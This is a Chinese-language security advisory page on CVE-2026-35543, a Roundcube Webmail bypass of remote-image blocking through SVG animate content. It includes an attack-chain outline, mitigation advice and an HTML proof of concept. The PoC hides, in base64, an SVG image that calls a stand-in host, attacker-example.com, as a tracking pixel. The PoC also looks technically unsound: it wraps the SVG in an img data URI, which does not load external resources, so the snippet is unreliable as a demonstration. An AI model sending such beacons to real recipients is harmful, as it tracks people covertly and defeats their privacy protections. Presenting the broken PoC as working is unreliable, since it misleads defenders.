CVE-2026-35543 CVSS 5.3 中危

CVE-2026-35543 Roundcube Webmail 远程图像阻止绕过漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35543

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Roundcube Webmail

漏洞概述

Roundcube Webmail 1.5.14和1.6.14之前的版本中存在安全漏洞。攻击者可利用电子邮件中带有animate属性的SVG内容绕过远程图像阻止功能。该漏洞的成功利用可能导致用户隐私信息泄露或访问控制被绕过。

技术细节

Roundcube Webmail默认配置会阻止加载远程图片，以防止通过邮件追踪技术（如Web Beacon）确认收件人是否阅读邮件。然而在受影响版本中，系统对邮件内容的过滤机制存在缺陷。具体而言，当攻击者在邮件HTML中嵌入包含`<animate>`属性的SVG数据时，Roundcube未能将其识别为需要拦截的远程内容。由于SVG支持动画和图像引用，这种特殊的构造方式欺骗了浏览器和邮件系统的安全检查。当受害者查看邮件时，恶意SVG被渲染，触发对外部资源的请求。这使得攻击者能够绕过隐私保护机制，获取用户的活跃状态信息，造成信息泄露。

攻击链分析

STEP 1

构造恶意邮件

攻击者创建包含SVG内容的HTML邮件，SVG中包含animate属性并引用远程资源。

STEP 2

投递邮件

攻击者将构造好的恶意邮件发送给使用Roundcube Webmail的目标用户。

STEP 3

绕过防护

目标用户打开或预览邮件，Roundcube的远程图像阻止机制未能拦截特定的SVG内容。

STEP 4

触发请求

浏览器解析并渲染SVG，向攻击者控制的服务器发送HTTP请求。

STEP 5

信息泄露

攻击者记录请求，确认目标邮箱活跃，导致用户隐私信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-35543: SVG Remote Image Bypass -->
<!-- This HTML snippet can be sent in an email body -->
<html>
<body>
  <h3>Test Image Bypass</h3>
  <!-- SVG with animate attribute to bypass filters -->
  <img src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMDAiIGhlaWdodD0iMTAwIj4KICAgIDx0ZXh0IHg9IjAiIHk9IjIwIiBmb250LXNpemU9IjIwIj5Qb2MgVGVzdDwvdGV4dD4KICAgIDxhbmltYXRlIGF0dHJpYnV0ZU5hbWU9IngiIGZyb209IjAiIHRvPSIxMDAiIGR1cj0iMXMiIHJlcGVhdENvdW50PSJpbmRlZmluaXRlIiAvPgogICAgPGltYWdlIHhsaW5rOmhyZWY9Imh0dHA6Ly9hdHRhY2tlci1leGFtcGxlLmNvbS9waXhlbC5naWYiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIC8+Cjwvc3ZnPg==" />
</body>
</html>

影响范围

Roundcube Webmail < 1.5.14

Roundcube Webmail < 1.6.14

防御指南

临时缓解措施

建议管理员尽快应用官方补丁进行升级。在升级完成前，用户应谨慎对待来源不明的邮件，避免在预览窗格中直接渲染HTML内容，可考虑临时将邮件显示模式设置为纯文本。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表